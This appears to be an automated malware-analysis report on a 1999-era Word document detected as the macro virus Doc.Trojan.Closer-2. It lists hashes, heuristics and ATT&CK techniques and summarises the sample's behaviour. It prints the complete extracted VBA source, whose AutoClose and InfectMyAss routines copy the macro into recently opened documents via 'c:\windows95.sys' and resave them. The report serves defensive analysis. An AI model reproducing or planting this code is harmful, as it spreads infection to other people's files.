Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 62e392638c622727…

MALICIOUS

Office (OLE)

35.5 KB Created: 1999-05-27 08:45:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 1c6b09818db0f8ae7dfefaef33fdbda8 SHA-1: 570d35f5fd590aedf0e39fce9eb968b6a850cb11 SHA-256: 62e392638c6227276ad916674bea3f7990d55a68870b37a0f65ff749c82e2a5d
140 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Word document containing VBA macros. The AutoClose macro is designed to open recent files, call the InfectMyAss subroutine, and then attempt to save the current document. The InfectMyAss subroutine exports the current macro to 'c:\windows95.sys' and then imports it into other documents, effectively spreading the macro. The presence of the AutoClose macro and the macro's self-propagation behavior strongly suggest a macro-based malware dropper.

Heuristics 4

  • ClamAV: Doc.Trojan.Closer-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Closer-2
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 950 bytes
SHA-256: e95f272b47776300f0022311ccf2bf4295928389642dafb138d69a30f6d9c4e3
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Closer"
Sub AutoClose()
Application.WindowState = wdWindowStateMinimize
RecMax = RecentFiles.Maximum
For i = 1 To RecMax
RecentFiles(i).Open
Call InfectMyAss
DocName = RecentFiles(i).Name
'Documents(DocName).Close
Next
Application.Quit
End Sub
Sub InfectMyAss()
On Error Resume Next

Set ActDok = ActiveDocument.VBProject.VBComponents
ActMod = Application.VBE.SelectedVBComponent.Name
ActInf = False

ActDok(ActMod).Export "c:\windows95.sys"

For i = 1 To ActDok.Count
    If ActDok(i).Name = ActMod Then ActInf = True
Next

If ActInf = False Then
    ActDok.Import "c:\windows95.sys"
    ActiveDocument.SaveAs ActiveDocument.FullName
End If
End Sub